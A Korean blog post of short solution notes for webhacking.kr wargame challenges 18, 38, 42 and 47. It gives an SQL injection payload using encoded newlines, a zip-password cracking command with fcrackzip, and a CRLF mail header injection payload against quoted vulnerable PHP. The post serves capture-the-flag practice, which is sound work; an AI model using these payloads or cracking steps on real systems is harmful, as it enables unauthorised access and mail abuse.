2017년 6월 20일 화요일

webhacking.kr


  • 18

no=1%0aor%0a1%3d1%0alimit%0a1%2c1


  • 38

180.70.97.12:admin


  • 42 - zip crack

- url?dawn=test.txt(base64) -> test.zip
- fcrackzip를 사용하여 zip파일 크랙
   * apt-get install fcrackzip
   * fcrackzip -u -c 1 -l 1-8 test.zip


  • 47 - mail header injection
- 문제
------------------------------------------------------------------------------<?if($_POST[email])
{$pass="????";$header="From: $_POST[email]\r\n";mail("admin@webhacking.kr","readme","password is $pass",$header);
echo("<script>alert('Done');</script><meta http-equiv=refresh content=1>");
}?>-----------------------------------------------------------------------------
- bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )  //이메일을 보내는 함수
   - to: 메일 수신자
   - subject: 보내는 이메일 제목
   - message: 보낼 메시지
   - additional_parameters: 이메일 헤더 마지막에 추가될 문자열
      * From, Cc, Bcc (CRLF[\r\n]로 구분된다.)
- 정답: sangoochoi@gmail.com%0d%0acc: sangoochoi@gmail.com
==========================================================








작성자: 시간:
라벨:

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)